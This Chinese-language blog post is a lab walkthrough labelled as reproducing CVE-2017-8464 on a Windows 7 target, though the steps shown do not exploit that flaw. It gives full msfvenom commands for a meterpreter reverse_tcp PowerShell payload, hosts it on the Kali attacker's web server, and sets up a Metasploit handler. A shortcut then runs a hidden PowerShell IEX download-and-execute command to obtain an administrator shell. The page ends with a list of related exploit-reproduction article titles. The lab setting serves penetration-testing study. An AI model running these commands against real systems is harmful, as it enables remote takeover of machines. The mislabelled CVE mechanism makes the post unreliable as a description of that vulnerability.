CVE-2017-8464 遠端命令執行漏洞復現
漏洞編號:CVE2017-8464
伺服器版本:Windows 7 專業版
攻擊工具:metasploit
靶機IP:192.168.1.198
攻擊機IP:192.168.1.187(kali)
漏洞復現原理:建立包含惡意執行指令碼的快捷方式並且執行,致使本機中毒。
執行kali,在終端中生成一個反彈shell,執行:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.187 LPORT=5555 -f psh-reflection>/opt/search.ps1
如果目標機是64位主機執行:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.187 LPORT=5555 -f psh-reflection>/opt/search.ps1
進入到【/opt】目錄下,檢視檔案“search.ps1”是否建立成功
將建立的“search.ps1”檔案copy到【/var/www/html】目錄下
啟動Apache伺服器
網頁訪問http://192.168.1.187/search.ps1,檢視是否成功
在kali下面啟動MSF軟體輸入命令
輸入命令進入【handler】use exploit/multi/handler
指定本機IP 【LHOST】
指定埠【LPORT】
設定返回載荷 set payload windows/x64/meterpreter/reverse_tcp
執行
在目標機中建立快捷鍵,在物件的位置中輸入:
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.187/search.ps1');test.ps1"
然後點選下一步,快捷名稱命名為:powershell.exe(預設的powershell.exe)
執行快捷方式,回到kali攻擊機中,如果msf從監聽模式變成如下形式,表示已經獲取目標機shell
執行ls命令,可以發現所列出的檔案在目標機的C盤下
執行shell命令,進入靶機,就可以執行cmd命令了(此處已經是管理員許可權,故而不在進行提權)
相關文章
- CVE-2017-8464遠端命令執行漏洞復現
- PHPMailer遠端命令執行漏洞復現PHPAI
- ThinkPHP 5.x 遠端命令執行漏洞分析與復現PHP
- 靶機練習---通達OA,遠端命令執行漏洞復現
- Apache SSI 遠端命令執行漏洞Apache
- Apache log4j2 遠端程式碼執行漏洞復現?Apache
- 遠端執行命令
- Weblogic修復"Java反序列化"過程遠端命令執行漏洞WebJava
- Go實現ssh執行遠端命令及遠端終端Go
- CNVD-2018-01084 漏洞復現報告(service.cgi 遠端命令執行漏洞)
- Firefox 31~34遠端命令執行漏洞的分析Firefox
- Apache Log4j2遠端命令執行漏洞Apache
- CVE-2018-1273 Spring Data Commons 遠端命令執行漏洞復現Spring
- Apache struts2遠端命令執行_CVE-2017-9805(S2-052)漏洞復現Apache
- Windows漏洞:MS08-067遠端程式碼執行漏洞復現及深度防禦Windows
- 【安全公告】Spring Core遠端命令執行漏洞預警Spring
- ThinkPHP遠端程式碼執行漏洞PHP
- phpunit 遠端程式碼執行漏洞PHP
- PKAV 發現 Struts2 最新遠端命令執行漏洞(S2-037)
- Joomla遠端程式碼執行漏洞分析OOM
- OpenWRT 曝遠端程式碼執行漏洞
- CVE-2017-7269 IIS6.0遠端程式碼執行漏洞復現
- 最新漏洞:Spring Framework遠端程式碼執行漏洞SpringFramework
- RCE(遠端程式碼執行漏洞)原理及漏洞利用
- 高危漏洞!Apache Log4j 遠端程式碼執行漏洞(附修復建議)Apache
- xxl-job預設accessToken命令執行漏洞復現
- 什麼是遠端程式碼執行漏洞?
- ThinkPHP 5.0.23 遠端程式碼執行漏洞PHP
- Apache Kylin遠端程式碼執行漏洞復現(CVE-2020-1956)Apache
- Apache Struts2遠端程式碼執行漏洞(S2-001)復現總結Apache
- Apache struts2 namespace遠端命令執行_CVE-2018-11776(S2-057)漏洞復現Apachenamespace
- GitLab存在嚴重漏洞,允許透過Github匯入實現遠端命令執行GitlabGithub
- Steam客戶端發現遠端程式碼執行漏洞:已放補丁客戶端
- Saltstack系列2:Saltstack遠端執行命令
- Windows命令遠端執行工具WinexeWindows
- 令無數程式設計師加班的 Log4j2 遠端執行漏洞復現程式設計師
- Chrome 77釋出,修復遠端程式碼執行漏洞!請儘快更新!Chrome
- VxWorks釋出安全更新修復多個高危遠端程式碼執行漏洞